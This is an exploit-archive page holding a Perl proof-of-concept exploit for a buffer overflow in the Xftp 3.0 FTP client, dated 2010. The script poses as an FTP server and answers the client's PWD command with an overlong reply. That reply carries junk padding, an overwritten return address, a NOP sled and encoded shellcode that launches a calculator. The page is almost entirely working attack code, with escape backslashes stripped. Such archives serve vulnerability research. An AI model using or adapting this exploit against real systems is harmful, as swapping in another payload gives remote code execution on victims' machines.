Xftp client 3.0 PWD Remote Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Xftp client 3.0 PWD Remote Exploit
# Published : 2010-04-22
# Author : zombiefx
# Previous Title : HP Digital Imaging (hpodio08.dll) Insecure Method Exploit
# Next Title : Viscom Software Movie Player Pro SDK ActiveX 6.8 Remote Buffer Overflow

# Exploit Title: Xftp client 3.0 PWD Remote Exploit
# Date: 2010-04-21
# Author: zombiefx
# Software Link: http://www.netsarang.com/download/down_xft3.html
# Version: Xftp 3.0 build 0238
# Tested on: Windows XP SP3
# Usage: ./xftp_exploit
# The BOF occurs when sending an overly long PWD response.
###########################################################################
# EDB Testing Notes:
# Buffer is length sensitive. If too long (example: 3000 bytes) you won't
# even get a crash at all. Tested on Windows XP SP3 ENG.
###########################################################################
# Code:
#!/usr/bin/perl
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new( LocalPort => '21', Proto => 'tcp', Listen => '1' )
  or die "Socket Not Created $!n";
print "#############################################################n"
    . "#Xftp client 3.0 PWD Exploit                                #n"
    . "#Listening on port 21                                       #n"
    . "#By:zombiefx  Email: darkernet[at]gmail.com                 #n"
    . "#Major Greetz to  corelanc0d3r/Dino Dai Zovi                #n"
    . "#############################################################n";
my $junk = "x41" x 1019;
my $eip  = pack( 'V', 0x100123AF ) x 4;    #Universal ..i think
my $nops = "x90" x 55;
my $calcshell =
    "x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49"
  . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
  . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
  . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
  . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
  . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47"
  . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c"
  . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a"
  . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
  . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43"
  . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a"
  . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c"
  . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44"
  . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
  . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47"
  . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50"
  . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44"
  . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43"
  . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42"
  . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b"
  . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45"
  . "x31x42x4cx42x43x45x50x41x41";

my $payload = $junk . $eip . $nops . $calcshell;

while ( my $data = $sock->accept() ) {
    print "Client Connected!nAwaiting Ftp commands: n";
    print $data "220 Microsoft FTP Servicern";
    while (<$data>) {
        print;
        print $data "331 Anonymous access allowed.rn"                            if (/USER/i);
        print $data "230-Welcome to FTP.MICROSOFT.COM.rn230 User logged in.rn" if (/PASS/i);
        print $data "257 "/$payload" is current directory.rn"                  if (/PWD/i);
    }
    print "Payload delivered check the client!n";
}